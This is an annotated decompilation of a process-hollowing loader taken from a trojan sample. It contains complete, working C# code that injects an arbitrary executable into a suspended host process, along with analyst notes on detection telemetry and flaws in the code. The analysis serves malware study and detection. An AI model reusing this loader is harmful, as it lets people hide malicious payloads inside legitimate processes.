// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
/// <summary>
/// Decompiled process-hollowing ("RunPE") loader. <see cref="R"/> starts a suspended
/// instance of a surrogate executable, unmaps the surrogate's own image, copies the
/// PE image held in a byte array into the child, repoints the child's PEB image base
/// and main-thread entry register at the injected image, and resumes the thread.
/// </summary>
/// <remarks>
/// Analyst notes:
/// <list type="bullet">
/// <item>Behaviourally this is MITRE ATT&amp;CK T1055.012 (Process Hollowing). The
/// telemetry chain to alert on is CreateProcess(CREATE_SUSPENDED) ->
/// NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory
/// -> SetThreadContext -> ResumeThread on the same child, all from a managed
/// (.NET) parent. The hollowed child's in-memory headers no longer match its
/// on-disk file, which memory scanners can detect.</item>
/// <item>Every size and offset below is the 32-bit (x86) layout: a 68-byte
/// STARTUPINFO, a 179-dword CONTEXT, PE32 (not PE32+) header offsets, and
/// <c>IntPtr.ToInt32()</c> on process addresses.</item>
/// <item>VB.NET-style artifacts (<c>- 1 + 1</c>, <c>index &lt;= num3</c>,
/// <c>Convert.ToInt32((string) null, 2)</c>) suggest the original was written in VB.NET
/// and then decompiled to C#.</item>
/// </list>
/// </remarks>
public class IX
{
    // STARTUPINFO is passed as an opaque 68-byte buffer (x86 size) and
    // PROCESS_INFORMATION as four IntPtrs; R uses [0] as hProcess and [1] as hThread
    // (the remaining two slots hold the process and thread ids and are unused here).
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool CreateProcess(
        string appName,
        StringBuilder commandLine,
        IntPtr procAttr,
        IntPtr thrAttr,
        [MarshalAs(UnmanagedType.Bool)] bool inherit,
        int creation,
        IntPtr env,
        string curDir,
        byte[] sInfo,
        IntPtr[] pInfo);

    // CONTEXT is passed as a raw uint[] (R allocates 179 dwords = 716 bytes, the x86
    // CONTEXT size); element 0 is ContextFlags and must be set by the caller.
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);

    // Same raw-array convention as GetThreadContext. Return value is ignored in R.
    [DllImport("kernel32")]
    private static extern bool SetThreadContext(IntPtr t, uint[] c);

    // ntdll native API (not part of the documented Win32 surface). Returns an
    // NTSTATUS; R treats only 0 (STATUS_SUCCESS) as success.
    [DllImport("ntdll")]
    private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

    // Buffer is declared as a ref IntPtr: R only ever reads one 4-byte pointer with it.
    [DllImport("kernel32")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool ReadProcessMemory(
        IntPtr hProc,
        IntPtr baseAddr,
        ref IntPtr bufr,
        int bufrSize,
        ref IntPtr numRead);

    // Returns the thread's previous suspend count; R discards it.
    [DllImport("kernel32.dll")]
    private static extern uint ResumeThread(IntPtr hThread);

    // allocType / prot are raw Win32 flag values; R passes 12288 (0x3000 =
    // MEM_COMMIT | MEM_RESERVE) and 64 (0x40 = PAGE_EXECUTE_READWRITE).
    // Returns IntPtr.Zero on failure — R never checks for that.
    [DllImport("kernel32")]
    private static extern IntPtr VirtualAllocEx(
        IntPtr hProc,
        IntPtr addr,
        IntPtr size,
        int allocType,
        int prot);

    // Declared but never called anywhere in this class.
    [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern bool VirtualProtectEx(
        IntPtr hProcess,
        IntPtr lpAddress,
        IntPtr dwSize,
        uint flNewProtect,
        ref uint lpflOldProtect);

    // Every WriteProcessMemory call in R ignores both the bool result and the
    // bytes-written count, so partial or failed writes go unnoticed.
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        uint nSize,
        out int lpNumberOfBytesWritten);

    /// <summary>
    /// Hollows a freshly created, suspended <paramref name="surrogateProcess"/> and
    /// replaces its image with the PE32 file image in <paramref name="bytes"/>.
    /// </summary>
    /// <param name="bytes">
    /// A complete PE32 file image (DOS header, NT headers and section raw data). Section
    /// contents are copied from their file offsets (PointerToRawData), so a memory-only
    /// or truncated image will throw inside the method.
    /// </param>
    /// <param name="surrogateProcess">
    /// Command line handed to CreateProcess (lpApplicationName is null, so the
    /// executable is resolved from this string).
    /// </param>
    /// <returns>
    /// <c>true</c> unless a managed exception escaped the body. Failures reported by the
    /// native calls (CreateProcess returning false, a non-zero NTSTATUS, a null
    /// allocation, failed writes) are not propagated; the method still returns
    /// <c>true</c>, and the surrogate is resumed regardless of whether it was modified.
    /// </returns>
    /// <remarks>
    /// The process and thread handles in pInfo are never closed (no CloseHandle
    /// import exists), so each call leaks two handles in the caller.
    /// </remarks>
    public static bool R(byte[] bytes, string surrogateProcess)
    {
        try
        {
            // Reused as the null pointer for lpProcessAttributes, lpThreadAttributes and lpEnvironment.
            IntPtr zero1 = IntPtr.Zero;
            // PROCESS_INFORMATION: [0] hProcess, [1] hThread (see usage below).
            IntPtr[] pInfo = new IntPtr[4];
            // STARTUPINFO (x86, 68 bytes), left entirely zeroed — even the cb field.
            byte[] sInfo = new byte[68];
            // e_lfanew: file offset of IMAGE_NT_HEADERS.
            int int32 = BitConverter.ToInt32(bytes, 60);
            // IMAGE_FILE_HEADER.NumberOfSections (NT headers + 6).
            int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
            // IMAGE_OPTIONAL_HEADER32.SizeOfHeaders (NT headers + 84): bytes copied as the header block.
            IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
            // creation = 4 is CREATE_SUSPENDED: the child's main thread never runs the original image
            // unless the steps below are skipped.
            if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
            {
                // x86 CONTEXT as raw dwords; 65538 = 0x10002 = CONTEXT_INTEGER, which
                // covers the Ebx/Eax slots read and written below.
                uint[] numArray1 = new uint[179];
                numArray1[0] = 65538U;
                if (IX.GetThreadContext(pInfo[1], numArray1))
                {
                    // Dword index 41 is Ebx in the x86 CONTEXT layout. For a just-created
                    // main thread Ebx holds the PEB address, and PEB + 8 is ImageBaseAddress,
                    // so this points at the surrogate's current image base.
                    IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
                    // Receives the 4-byte image base read from the child's PEB.
                    IntPtr zero2 = IntPtr.Zero;
                    IntPtr bufrSize = new IntPtr(4);
                    // Bytes-read count; not inspected.
                    IntPtr zero3 = IntPtr.Zero;
                    // Read the surrogate's image base, then unmap that image from the child.
                    // A non-zero NTSTATUS skips the whole rewrite but the child is still resumed.
                    if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
                    {
                        // OptionalHeader.ImageBase (+52): the payload's preferred base.
                        IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
                        // OptionalHeader.SizeOfImage (+80): total virtual size to reserve.
                        IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
                        // 12288 = MEM_COMMIT | MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE. The result is
                        // used as the image base without being checked: if the call fails it is
                        // IntPtr.Zero and every later write targets an RVA from address 0; if it
                        // succeeds at a different address nothing relocates the image (no
                        // relocation processing exists in this class).
                        IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
                        int lpNumberOfBytesWritten;
                        // Copy the first SizeOfHeaders bytes (DOS/NT/section headers) to the new base.
                        IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
                        // VB-style inclusive loop bound: iterates NumberOfSections times.
                        int num3 = int16 - 1;
                        for (int index = 0; index <= num3; ++index)
                        {
                            // One 40-byte IMAGE_SECTION_HEADER viewed as 10 dwords. 248 = 24 (signature +
                            // file header) + 224 (PE32 optional header), so only PE32 inputs parse correctly.
                            // dst[3] = VirtualAddress, dst[4] = SizeOfRawData, dst[5] = PointerToRawData.
                            int[] dst = new int[10];
                            Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
                            // "- 1 + 1" is a VB upper-bound artifact; length is simply SizeOfRawData.
                            byte[] numArray2 = new byte[dst[4] - 1 + 1];
                            // Convert.ToInt32((string) null, 2) evaluates to 0 (documented behaviour for a
                            // null string) — an obfuscated destination offset of 0. Copies the section's
                            // raw data out of the file image.
                            Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
                            // Destination = new base + section VirtualAddress. ToInt32 on the pointer
                            // throws OverflowException for addresses outside the 32-bit range.
                            num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
                            num1 = new IntPtr(numArray2.Length);
                            IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
                        }
                        // Overwrite PEB.ImageBaseAddress (Ebx + 8) with the injected image's base so the
                        // loader and the process itself report the new image.
                        num2 = new IntPtr((long) numArray1[41] + 8L);
                        num1 = new IntPtr(4);
                        IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
                        // Dword index 44 is Eax, which the thread start-up stub uses as the entry point;
                        // set it to new base + OptionalHeader.AddressOfEntryPoint (+40).
                        numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
                        // Result ignored.
                        IX.SetThreadContext(pInfo[1], numArray1);
                    }
                }
                // Runs on every path after a successful CreateProcess, including the ones where
                // GetThreadContext / ReadProcessMemory / NtUnmapViewOfSection failed — in that case
                // the untouched surrogate simply executes normally.
                int num = (int) IX.ResumeThread(pInfo[1]);
            }
        }
        catch
        {
            // Blanket catch: IndexOutOfRangeException from a truncated image, OverflowException
            // from ToInt32 on a 64-bit pointer, marshalling errors, etc. all collapse to false
            // with the cause discarded.
            return false;
        }
        // Reached regardless of whether any native call succeeded.
        return true;
    }
}